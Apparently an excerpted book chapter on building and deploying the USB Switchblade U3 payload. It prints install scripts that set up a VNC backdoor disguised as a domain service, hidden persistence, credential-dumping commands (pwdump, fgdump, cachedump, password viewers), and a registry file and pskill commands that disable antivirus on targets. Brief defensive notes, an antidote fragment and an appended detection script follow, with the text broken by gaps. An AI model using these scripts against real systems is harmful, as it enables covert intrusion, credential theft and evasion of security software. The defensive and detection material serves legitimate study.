TightVNC

TightVNC is a remote-control software package that is provided free of charge (GNU General Public License [A]) with full source-code availability. It provides a stable client or server remote utility, permitting graphical desktop representations of target UNIX and Windows platforms via the local network or Internet. This version of VNC provides enhanced capabilities such as file transfers, mirror drivers (efficient screen updates), remote desktop scaling, and a new Tight encoding with JPEG compression, which optimizes slow connections by generating significantly less traffic. Browser access is also included via an HTTP server and a Java viewer applet. Two passwords are supported, for read-only and full-control access. TightVNC is maintained by Constantin Kaplinsky with the assistance of multiple corporations who participate in development and life-cycle support. Updated software can be found at www.tightvnc.com/download.php.

NOTE
Look at the clever display name and service description inserted in the script below, put in place to deter an uninformed user from stopping it.

    XCOPY ".\vnc\*.*" "%systemroot%" /c /y
    SC create WinVNC binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" 2>&1
    SC description WinVNC "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." 2>&1
    REGEDIT /s .\vnc.reg 2>&1
    NET START WinVNC 2>&1

[A] www.gnu.org/copyleft/gpl.html

Hacksaw

This version of the USB Switchblade provides an option to install Hacksaw. It provides the typical functions that were covered in Chapter 1, “USB Hacksaw,” with some minor tweaks. The original version of the USB Switchblade transferred the log files containing the output back to the writable portion of the USB flash drive. While this feature is still available, the addition of Hacksaw allows the logs to be sent via e-mail to an address of the user’s choosing. The sbs.exe will still run in the background and transfer the data of USB drives that are inserted into the installed system. The supported version of the Hacksaw program is included with the download package provided in the next section.

    MD "%systemroot%\$NtUninstallKB931337$" || MD "%appdata%\sbs" 2>&1
    XCOPY .\HS\*.* "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY .\HS\*.* "%appdata%\sbs" /y 2>&1
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.lnk" /f || "%appdata%\sbs\shortcut.exe" /f:"%allusersprofile%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" 2>&1
    COPY ".\send.bat"+%include%\HS.dat" "%systemroot%\$NtUninstallKB931337$\send.bat" || COPY ".\send.bat"+%include%\HS.dat" "%appdata%\sbs\send.bat" 2>&1
    COPY %include%\HS2.dat" "%systemroot%\$NtUninstallKB931337$\stunnel.conf" || COPY %include%\HS2.dat" "%appdata%\sbs\stunnel.conf" 2>&1
    ATTRIB "%systemroot%\$NtUninstallKB931337$" +s +h & ATTRIB "%appdata%\sbs" +s +h 2>&1
    .\SBS.lnk & .\SBS2.lnk

WirelessKeyView

WirelessKeyView is a utility from Nirsoft. It can recover all wireless network security keys for the Wireless Encryption Protocol (WEP) and Wi-Fi Protected Access (WPA) that are contained in the Wireless Zero Configuration (XP) and WLAN AutoConfig (Vista) services on a system. This tool’s command options give you the ability to sort or export to various formats. The following Web site can be checked if updated versions are required: www.nirsoft.net/utils/wireless_key.html.
    .\wifike.exe /stext %tmplog% >> %log% 2>&1

Password Dump

PwDump is a name given to several programs from multiple developers that output the NT LAN Manager (Windows NTLM) and LAN Manager (LM) password hashes for user accounts contained in the local Security Accounts Manager (SAM). This tool is used to extract the raw password hashes from a Windows SAM file. Once you have extracted the hashes from the Windows SAM file, an alternate program can be used to find the plain-text passwords used on the system. The next section will describe the additional tools required to interpret the hashes derived from this program. The most recent version of the software can be found at www.tarasco.org/security/pwdump_7/index.html.

    .\pwdump 127.0.0.1 >> %log% 2>&1

Fizzgig Dump

Fgdump was developed for use in environments with AV and other detection software enabled. It includes the PwDump and CacheDump utilities in a wrapper to minimize the number of issues that have been increasing while running these tools individually. The development of this tool appears to be in full swing, with extensive auditing targeted for Windows domains and their respective trust relationships (additional tools are required for this). This tool is being provided in addition to the individual PwDump and CacheDump utilities in case problems are encountered running them natively. The updated release of this software can be found at http://swamp.foofus.net/fizzgig/fgdump/downloads.htm.

    "%U3%\fgdump.exe" -c >> %log% 2>&1

Network Password Recovery

Network Password Recovery allows an administrator to recover all passwords (including domain) of the currently logged-on user used for establishing connections to network shares. It can also retrieve .NET Passport passwords for sites if they were saved in this manner. External credentials files can also be parsed so long as the last logged-on account password is known.
This is another utility written by Nirsoft, and current versions can be found at www.nirsoft.net/utils/network_password_recovery.html.

    .\netpass.exe /stext %tmplog% >> %log% 2>&1

Mail Password Viewer

Mail PassView is a tool that can reveal the password and account details for numerous e-mail clients. The supported clients include Outlook Express, Microsoft Outlook 2000/2002/2003/2007, Windows Mail, Windows Live Mail, IncrediMail, Eudora, Netscape 6.x/7.x (without master password encryption), Mozilla Thunderbird (without master password encryption), Group Mail Free, Yahoo! Mail (if stored in the Yahoo! Messenger application), Hotmail/MSN mail (if stored in the MSN/Windows/Live Messenger application), and Gmail (if stored in the Gmail Notifier application, Google Desktop, or by Google Talk). Once again, this is another Nirsoft tool, and updates can be found at www.nirsoft.net/utils/mailpv.html.

    .\mailpv.exe /stext %tmplog% >> %log% 2>&1

Firefox Password Recovery

FirePassword is a tool designed to decrypt the credentials from the Mozilla Firefox database. Firefox records username and password details for every Web site the user authorizes and stores them in an encrypted database. The master password will be needed if one is set; otherwise, the tool will not be able to display these. Some sites also prevent the saving of passwords in a browser, which is another limitation that should be considered. Check the following site for the most recent updates to this tool: www.securityxploded.com/download/FirePassword_bin.zip.

    .\FirePassword.exe >> %log% 2>&1

Internet Explorer Password Viewer

Internet Explorer PassView is another tool from Nirsoft designed to provide password management, which can reveal passwords that have been stored in the browser. This utility can recover three different types of passwords: AutoComplete, HTTP authentication passwords, and FTP. It gathers these by parsing Windows protected storage, the registry, and a credential file.
Known issues exist starting with Internet Explorer 7.0 because Microsoft is changing the way in which some passwords are stored, so limitations may be encountered. The most recent versions of this software include the ability to read offline or external sources if you know the password of the last logged-on user for this profile. Check this site if updated versions are required: www.nirsoft.net/utils/internet_explorer_password.html.

    .\iepv.exe /stext %tmplog% >> %log% 2>&1

Messenger Password Recovery

MessenPass is another password recovery tool that reveals the passwords of common instant-messenger applications. It can be used only to recover the passwords for the currently logged-on user on the local computer, and it only works if you chose the “remember your password” option in the programs. This tool cannot be used for grabbing the passwords from other user profiles. When running MessenPass, it automatically detects the instant-messenger applications installed on the target system, decrypts the passwords, and displays all user credentials found. This Nirsoft tool can be found at www.nirsoft.net/utils/mspass.html.

    .\mspass.exe /stext %tmplog% >> %log% 2>&1

CacheDump

CacheDump was designed to capture the credentials of a domain user who is currently logged on to a system. It targets Windows’ inherent offline caching techniques performed by the Local Security Authority (LSA) system service. This service uses a cached version of the password to allow users to log on when a domain controller is unavailable to authenticate them. This tool creates a temporary service, allowing it to grab hash values of passwords, which can be taken offline for later cracking. The most current release of this program can be found at www.hacktoolrepository.com/category/9/Passwords.
    .\cachedump.exe >> %log% 2>&1

Protected Storage Password Viewer

Protected Storage PassView is yet another Nirsoft tool designed to divulge passwords housed on a system and stored by Internet Explorer, Outlook Express, and MSN Explorer. This tool also has the capability to reveal information stored in the AutoComplete strings of Internet Explorer. If an update for this tool is required, check the following location: www.nirsoft.net/utils/pspv.html.

    .\pspv.exe /stext %tmplog% >> %log% 2>&1

Product Key Recovery

ProduKey, a tool from Nirsoft, presents the product identifier and the associated keys for Microsoft products installed on the system. Microsoft Office 2003/2007, Exchange, SQL, and even operating system (including Windows 7) keys can be extracted using this. It is also capable of gathering keys from remote systems if permissible and includes additional customizable command options for your convenience. The following location contains additional information regarding this tool: www.nirsoft.net/utils/product_cd_key_viewer.html.

    .\produkey.exe /nosavereg /stext "%tmplog%" /remote %computername% >> %log% 2>&1

History Scraper

A preconfigured VB script has been included in the Switchblade download package to provide a summary of the most recently viewed Web sites on the target machine. No additional files or updates are required in order for this to complete.

    CSCRIPT //nologo .\DUH.vbs >> %log% 2>&1

Windows Updates Lister

WinUpdatesList will display all of the Windows updates, including hotfixes, that are installed on a local or remote system. Hotfix information includes the associated files, and the user interface will even provide a link to the Microsoft site, which includes detailed information related to the specific update. This tool applies to Windows 98, ME, 2000, and XP but is not yet available for Vista and later. The following Web site contains additional information regarding this tool: www.nirsoft.net/utils/wul.html.
    .\wul.exe /stext %tmplog% >> %log% 2>&1

Network Statistics

The network statistics command displays active network connections, listening ports, associated processes, and a variety of other network statistics. This tool is already included on all relevant Windows systems.

    netstat.exe -abn >> %log% 2>&1

Port Query

Portqry.exe is a command-line utility that is often used to troubleshoot network connectivity issues. Portqry.exe is included on systems based on Windows 2000, XP, and 2003 and can be downloaded for use on others. The utility reports the status of Transmission Control Protocol and User Datagram Protocol ports on a desired machine. It is able to report listening, nonlistening, and filtered ports individually, by listing, or in a sequential range. The most updated version of this tool can be found at www.microsoft.com/downloads/details.aspx?familyid=89811747-c74b-4638-a2d5-ac828bdc6983&displaylang=en.

    .\portqry -local -l %tmplog% >> %log% 2>&1

The tools described above are already contained in the USB Switchblade package download provided in the next section. If you intend to use the tools included in Switchblade, it would be in your best interest to familiarize yourself with each independently. Each of these tools provides additional parameters and customization options depending on your needs. The attack recreation included below will provide you with a basic understanding of how these are commonly deployed.

Switchblade Assembly

As previously stated, the ultimate goal of USB Switchblade is to simplify the recovery of critical information from computers running Windows 2000 or later. With administrator access, it is able to retrieve password hashes, LSA secrets, IP information, and much more. This section will demonstrate how to build and deploy a U3 flash drive with the -=GonZor=- SwitchBlade technique.
WARNING
If any AV applications are running on the machine you are using to download or create the U3 Switchblade, problems will be encountered. Most antivirus software will recognize the tools contained in Switchblade as malicious and will attempt to remove them. To head off any problems, disable antivirus on the system you are using to build Switchblade.

NOTE
If User Account Control (UAC) is enabled on Vista or Windows 7, the user will be prompted to allow the execution of the tools within the Switchblade. A dialogue box stating “Windows needs your permission to continue” will be displayed. This must be disabled on these systems when building the Switchblade and to enable automated retrieval on target systems.

This first set of directions will build a default version of Switchblade. These are provided for quick reference should you encounter an updated release of the Switchblade software, which may better suit your needs. Customization instructions will follow these procedures to allow you to update or add to existing distributions.

1. The Switchblade v2.0 payload needs to be downloaded. This package can be found at http://rapidshare.com/files/113283682/GonZors_SwitchBlade-V2.0.zip.
2. If you are using an XP system, the Universal Customizer software previously downloaded for Chapter 1, “USB Hacksaw,” can be used to complete this process. If you have Vista or 7 systems, download the compatible Universal Customizer at http://rapidshare.de/files/40767219/Universal_Customizer_1.4.0.2.rar.html.
3. Create a separate directory for each program you just downloaded and unzip the files into their respective folders.
4. Place the U3CUSTOM.iso from the Switchblade folder into the bin folder of the Universal Customizer directory.
5. Insert your U3 USB drive.
6. Launch the Universal Customizer by executing Universal_Customizer.exe.
7. Follow the on-screen instructions and prompts until complete, accepting the default selections where applicable. Steps 9–13 in the “How to Recreate the Attack” section of Chapter 1, “USB Hacksaw,” provide detailed directions and screenshot illustrations for these steps.
8. If you receive a failure at the end, repeat steps 5 and 6 at least three times. If failures persist, download and install the latest version of the LaunchPad installer (lpinstaller.exe) at http://mp3support.sandisk.com/downloads/LPInstaller.exe. Sporadic results can be encountered with this program as well, so let your tenacious side shine through.
9. Once you have successfully applied the Switchblade ISO using the Universal Customizer process, place the SBConfig.exe and ip.shtml from the Switchblade directory onto the removable disk partition and run SBConfig.exe.
10. Enable the desired tools by checking the appropriate boxes and entering all other required information. After making your changes, select Update Config. The next section will describe these and other steps in more detail and provide caveats for deployments on related systems.

This completes a basic USB Switchblade installation for the GonZor package.

Customizing the Original Payload

The steps below will walk you through updating an existing tool within a payload. Testing of the package previously prescribed produced some errors when trying to parse the updated target applications. Changes were made to the wget command to properly output an external IP address in the log file. Additional procedures are provided to disable AVG antivirus to smooth the automated initialization of the Switchblade script. In order to modify the original payload, you will need to extract the files from the GonZor ISO. This process can be used to update any of the tools used in the payload. The following will be needed to complete this customization.

• Any U3 drive
• A working version of the GonZor USB Switchblade
• The current version of PsTools, or the PsKill utility specifically. The download location for this was provided in Chapter 1, “USB Hacksaw.”
• Download and install the current version of MagicISO. This tool can be downloaded from www.magiciso.com/.

NOTE
At the time of this writing, the most recent version of the Switchblade payload was v2.0.

1. Create a separate folder for each program you just downloaded and unzip the files into their respective folders.
2. Create a new directory to extract the original GonZor ISO. We will refer to this directory as %GONZOR_ISO%\ in the following steps.
3. Copy the U3CUSTOM.iso from the GonZor SwitchBlade payload directory into %GONZOR_ISO%\.
4. Open MagicISO and browse to the U3CUSTOM.iso. Right-click the U3CUSTOM.iso file and extract it to %GONZOR_ISO%\.
5. Copy pskill.exe to %GONZOR_ISO%\SYSTEM\SRC.

NOTE
The AVG 9.0 service name has changed in the registry. For this reason, there are two driver entries specified in the file, for both AVG 8.5 and AVG 9.0, in the next step. If you encounter a newer release of AVG, this registry file may need to be adjusted to work in an updated environment.

6. Next, create a .reg file to disable the AVG antivirus services and set them to take no action in the event of a service failure. Copy and paste the text given below into a Notepad file and save it as AVKill.reg. Any other services of concern can be added to this file for disablement. The Start and FailureActions values included here can be duplicated for the additional services.
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg8wd]
    "Start"=dword:00000004
    "FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,53,00,65,\
      00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg9wd]
    "Start"=dword:00000004
    "FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,53,00,65,\
      00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00

7. Save this Notepad file as AVKill.reg to %GONZOR_ISO%\SYSTEM\SRC\.
8. Locate the go.bat file in %GONZOR_ISO%\SYSTEM\SRC. Right-click and select Edit, and then find the 0.dat line in this file.
9. In go.bat, enter the following text. Killing of other processes is included as a fail-safe due to inconsistencies found between the various versions of Windows operating systems. If you added other services to the registry file in step 6, their associated processes must be included here.

    ECHO >> %log% 2>&1
    ECHO + + >> %log% 2>&1
    ECHO + [AVGKill] + >> %log% 2>&1
    ECHO + + >> %log% 2>&1
    ECHO AVG services have been disabled >> %log% 2>&1
    REGEDIT /s .\avkill.reg >> %log% 2>&1
    .\pskill -t avgam.exe >> %log% 2>&1
    .\pskill -t avgrsx.exe >> %log% 2>&1
    .\pskill -t avgwdsvc >> %log% 2>&1
    .\pskill -t avgnsx.exe >> %log% 2>&1
    .\pskill -t avgcsrvx.exe >> %log% 2>&1
    .\pskill -t avgtray.exe >> %log% 2>&1
    .\pskill -t agrsmsvc.exe >> %log% 2>&1
    .\pskill -t avgwdsvc.exe >> %log% 2>&1
    )
    IF EXIST %include%\19.dat" (
    ECHO

10. Search for and find the 1.dat line in the same file. Place a “;” at the start of the commands used for the wget. The wget commands should now appear like the statements below.

    ;.\wget.exe %eipurl% output-document=%tmplog% 2>&1
    ;ECHO. >> %tmplog% 2>&1
    ;COPY %log%+%tmplog%* %log% >> NUL
    ;DEL /f /q %tmplog% >NUL

11. Insert the following wget command line just above the old wget command.

    .\wget -q -O - http://whatismyip.com/automation/n09230945.asp >> %log% 2>&1

12. Save and close the file.
13. Copy and paste the entire contents of %GONZOR_ISO%\ (except the U3CUSTOM.iso) into the U3Custom folder of the Universal Customizer.

TIP
Ensure that the Universal Customizer\U3Custom directory is empty before you copy the updated files into it. Only files that you want included in the final ISO should be contained in this folder.

14. Run the ISOCreate.cmd in the root of the Universal Customizer directory to create the updated ISO. The output provided should appear similar to Figure 2.1.
15. Press any key when prompted to complete the build.
16. The updated ISO will be placed into the bin directory automatically.
17. Insert your U3 drive and run the Universal_Customizer.exe to load the updated ISO.
18. Follow the prompts until complete, accepting the default selections, and provide a password when required. Steps 9–13 in the “How to Recreate the Attack” section of Chapter 1, “USB Hacksaw,” provide screenshot illustrations for this process.
19. Insert the U3 drive and place the SBConfig.exe (this file is located in the unpacked Switchblade payload) onto the removable disk partition and run it.
20. Select the tools from the payload that you want to run by checking the boxes, as shown in Figure 2.2. The output of this script will be sent to a log file on [...]

FIGURE 2.1 Universal Customizer ISOCreate Command Window
FIGURE 2.2 GonZor Payload Configuration Options Dialogue

[...] configuration when prompted.
23. You have now established a customized version of the -=GonZor=- Payload v2.0 on your U3 smart drive, which can be used to retrieve all kinds of goodies once it is plugged into a computer with administrative privileges.

As you can see, it wasn’t very difficult to customize a smart U3 USB. Use extreme caution when anyone requests to insert his or her USB flash drive into your [...]
[...] the installation executable and click Next, as seen in Figure 2.3.
3. Select all components, as shown in Figure 2.4, and click Next.
4. Install in the default directory, as indicated in Figure 2.5, and click Next.
5. Install the tables in the default directory, as depicted in Figure 2.6, and click Install.

Figure 2.3 ophcrack Installation Dialogue
Figure 2.4 ophcrack Installation [...]

[...] service accounts. This vulnerability affected Windows 2000, XP, 2003, Vista, and 2008.

Defensive Techniques

There are many defensive strategies that can be applied on Windows systems to mitigate the USB Switchblade capabilities. The tactics outlined in the “Defending against This Attack” section in Chapter 1, “USB Hacksaw,” apply to the USB Switchblade as well. Proceed with caution when implementing any [...]

[...] as owned.

Evolving Aspects

This USB Switchblade compilation appears to be a favorite at the Hak.5 community site. Adaptations are abundant, and many of the notorious hard-line hacking and forensic-based tool suites are finding their way into these types of preconfigured packages. Multiple versions already exist on the main USB Switchblade site. [B] (Some [...]

[B] http://www.hak5.org/usb-switchblade

[...] CD-ROMs or DVDs.
14. Next, copy and paste the results from the [Dump SAM PWDUMP] section of the Switchblade log file on the U3 USB drive into a separate Notepad file.
15. Save the file in a known location.
16. In ophcrack, click Load and select PWDUMP file, as depicted in Figure 2.13.
17. Navigate to where you saved the Notepad file (step 15) and select it.
18. The LM hash from the file will be displayed in [...]
[...] suggested improvements.

System Execution Prevention and USB Antidote

Perhaps you inadvertently inserted the USB Switchblade into a system, or someone accidentally used the drive while you were unaware. These unintentional infections can be a burden, but fortunately there are methods to ease these situations. Pressing and holding down the Shift key while inserting a USB drive can suppress the autorun on a particular [...]

    [...] and
    :: there are a lot more things which can be added, but
    :: this is just to show that the U3 exploit can
    :: also be used for whitehat purposes
    :: The normal USB antidote, works for both Home and
    :: Professional
    start csrss.exe
    ping -n 2 localhost > nul
    services.exe -uninstall -name:"WinVNC"
    IF EXIST C:\WINDOWS\System32\taskkill.exe (
    taskkill /F /IM sbs.exe
    [...]

[D] http://www.hak5.org/packages/files/antidote.rar

[...] applications. This list can be used to provide a potential target for man-in-the-middle (MITM) attacks, which could be used to intercept communication and gather credentials and related information about the particular site. These are just a small sampling of jeopardizing actions that could be accomplished if a tool such as the USB Switchblade was successfully deployed. The data provided by this suite of tools not [...]

[...] free fast was used in this example.
13. Navigate to the location where you saved the table, as seen in Figure 2.12, and click Install. Keep in mind that storing the rainbow tables on a fast medium like [...]

Figure 2.7 ophcrack Installation Dialogue
Figure 2.8 ophcrack Installation Dialogue
Figure 2.9 ophcrack Installation Dialogue
Figure 2.10 ophcrack [...]
[...] entry of 00000001 would enable this feature and is the default state.

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
    "forceguest"=dword:00000000

The following snippet contains the code used in the win.reg file. Setting the account value to the entry below will hide it from plain view. As in the above example, a value of 00000001 [...]
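As an added defensive example (not code from the book, the GonZor package, or the antidote script above), the following PowerShell 3.0+ script checks a Windows host for the persistence artifacts named in the TightVNC and Hacksaw install commands earlier in the chapter: the service name, drop folders, Run value, Startup shortcut and process names are taken from those scripts; everything else is an assumption.

```powershell
# Added example, not from the book or the GonZor package: report the persistence
# artifacts the Switchblade install script leaves behind (the disguised WinVNC
# service, the $NtUninstallKB931337$ and %appdata%\sbs drop folders, the USBMedia
# Run value, the Startup shortcut to sbs.exe, and running sbs/winvnc processes).
# Run from an elevated PowerShell prompt; it only reports and removes nothing.

$findings = @()

# 1. The TightVNC service registered as "WinVNC" with the misleading display name,
#    plus any other service whose binary is winvnc.exe.
$svc = Get-Service -Name 'WinVNC' -ErrorAction SilentlyContinue
if ($svc) {
    $findings += "Service WinVNC present (DisplayName='$($svc.DisplayName)', Status=$($svc.Status))"
}
Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.PathName -match 'winvnc\.exe' } |
    ForEach-Object { $findings += "Service $($_.Name) runs $($_.PathName)" }

# 2. The Hacksaw drop folder disguised as a hotfix uninstall directory, and its
#    %appdata%\sbs fallback. The script marks both system+hidden, hence -Force.
$dropDirs = @(
    (Join-Path $env:SystemRoot '$NtUninstallKB931337$'),
    (Join-Path $env:APPDATA 'sbs')
)
foreach ($dir in $dropDirs) {
    if (Test-Path -LiteralPath $dir) {
        $attrs = (Get-Item -LiteralPath $dir -Force).Attributes
        $findings += "Directory $dir exists (attributes: $attrs)"
    }
}

# 3. The HKLM Run value named USBMedia that relaunches sbs.lnk at every logon.
$runKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$run = Get-ItemProperty -Path $runKey -Name 'USBMedia' -ErrorAction SilentlyContinue
if ($run) {
    $findings += "Run value USBMedia -> $($run.USBMedia)"
}

# 4. The fallback: a shortcut in the all-users Startup folder whose target is sbs.exe.
$startup = [Environment]::GetFolderPath('CommonStartup')
$shell = New-Object -ComObject WScript.Shell
Get-ChildItem -LiteralPath $startup -Filter '*.lnk' -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $target = $shell.CreateShortcut($_.FullName).TargetPath
        if ($target -match 'sbs\.exe$') {
            $findings += "Startup shortcut '$($_.Name)' -> $target"
        }
    }

# 5. The Hacksaw copier or the VNC server currently running.
Get-Process -Name 'sbs', 'winvnc' -ErrorAction SilentlyContinue |
    ForEach-Object { $findings += "Process $($_.ProcessName) (PID $($_.Id)) is running" }

if ($findings.Count -eq 0) {
    Write-Output 'No Switchblade/Hacksaw persistence indicators found.'
} else {
    Write-Output 'Possible Switchblade/Hacksaw indicators:'
    $findings | ForEach-Object { Write-Output "  - $_" }
}
```

A hit on any of these items is worth treating as the host having been "owned" in the chapter's sense, since the same script also dumped credentials to the drive; the antidote script above then removes the service and kills sbs.exe.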